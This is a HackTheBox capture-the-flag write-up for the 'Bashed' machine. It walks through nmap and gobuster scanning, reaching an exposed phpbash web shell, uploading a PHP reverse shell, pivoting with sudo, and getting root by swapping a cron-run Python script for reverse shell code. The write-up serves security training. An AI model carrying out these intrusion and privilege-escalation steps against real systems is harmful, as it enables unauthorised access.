Bashed HTB Writeup
Hi everyone, this is my writeup for box “Bashed” found on HackTheBox .
Nudge Section :
- Visit /dev to get WebShell,
- Upload php-reverse-shell in /uploads directory from phpbash WebShell to get reverse shell,
- Change the code in test.py with that of reverse shell to escalate privileges to root.
Machine IP Address : 10.10.10.68
Part 1 : Recon
1. Starting off with an Nmap Scan to get information about the open ports.
nmap -sC -sV -Pn 10.10.10.68
We get the following results from the nmap scan:
We have only 1 port open.
Port 80 : Running Apache 2.4.18
2. Before Enumerating further let’s run a gobuster scan.
gobuster dir -u http://10.10.10.68/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -e
We get some interesting directories from the scan.
/uploads , /php and /dev
Part 2: Enumeration
- Let’s begin our enumeration by visiting the webpage on port 80
Clicking on the arrow and phpbash on first page leads us to http://10.10.10.68/single.html. There, we can find a link to a GitHub repository ( https://github.com/Arrexel/phpbash ) explaining that phpbash is a standalone, semi-interactive web shell.
Visiting the Github repository link ( https://github.com/Arrexel/phpbash ) give us juicy information on how to access the shell.
As visible in the screenshot (on the github page) the WebShell is in the uploads directory, Also we got the same directory listed in the gobuster scan.
BUT!! visiting the /uploads directory showed a blank page. Don’t worry let’s visit the other interesting directory we got from gobuster scan.
On visiting the /dev directory we get the index listed for the WebShells.
Part 3 : Getting User Flag
Visiting the WebShells we got from the /dev directory we got a shell as Apache’s default user www-data. Now let’s try to get the user flag.
We get the user flag by looking into the arrexel directory .
Part 4 : Getting Root Flag
Now let’s try for privilege escalation. Running the sudo -l command gives us some juicy information Let’s take note of it for later use.
Now let’s try to get linPeas.sh in order to get information for privilege escalation. I tried several ways ( wget, curl, git clone, upload functionality of phpbash ) to get the script But I got no success. So I started manually enumerating the box and also thinking about getting a reverse shell to our host machine.
As I was stuck at this point So, I took a break and decided to come back later.
I started again by going through the gobuster scan. I got a php file in the /php directory But it was also a dead end.
Now we are left with /uploads directory. So I thought what if we could create a file in /uploads directory using the WebShell and access it by visiting through url and BINGO!! we can do that. Now let’s upload a php reverse shell.
Now it’s time to get a reverse shell….Don’t forget to start NetCat listener on your machine.
First of all let us make the shell stable by using :
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’.
Remember the result we got from sudo -l. So change the user to scriptmanager by using
sudo -u scriptmanager bash
Now let’s try to further enumerate the box.
The scripts directory stands out so let’s take a look into it.
Taking a look at test.py we can conclude that both test.txt and test.py are interrelated.
Observe that the test.txt file is owned by root think what if we could add a reverse shell code in test.py and the reverse shell we will get will run as root!! So let’s remove the original test.py file and replace it with a test.py created by us in our local machine which contains reverse shell code.
We can transfer the file using python server in our local machine and wget on the bashed machine to get the file.
python3 -m http.server
As the test.py file is run as a cronjob so just wait for 1 minute to get the reverse shell in your local machine.
Annddddd…. finally the machine is pwned.
Thanks for reading the Writeup. I hope you liked it any kind of feedback or suggestions are appreciated. You can reach out to me on :
Twitter : https://twitter.com/Viren2737